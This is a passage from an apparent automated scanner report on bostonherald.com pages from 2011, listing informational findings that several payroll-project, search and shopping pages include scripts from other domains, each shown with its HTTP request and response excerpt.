Path:   /projects/payroll/cambridge/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/cambridge/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/cam_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.710. http://www.bostonherald.com/projects/payroll/cca/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cca/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/cca/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.711. http://www.bostonherald.com/projects/payroll/mass_pike/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/mass_pike/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/mass_pike.js" type="text/javascript"></script>
...[SNIP]...
<!--//FOOTER end//-->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.712. http://www.bostonherald.com/projects/payroll/quasi_state/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/quasi_state/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>

<script src="http://bh.heraldinteractive.com/projects/payroll/quasi_state.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.713. http://www.bostonherald.com/projects/payroll/quincy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/quincy/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.714. http://www.bostonherald.com/projects/payroll/springfield/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/springfield/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/springfield/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/spring_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.715. http://www.bostonherald.com/projects/payroll/suffolk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/suffolk/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.716. http://www.bostonherald.com/projects/payroll/worcester/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/worcester/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.717. http://www.bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.718. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.719. http://www.bostonherald.com/shopping/half_price_boston/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /shopping/half_price_boston/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shopping/half_price_boston/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
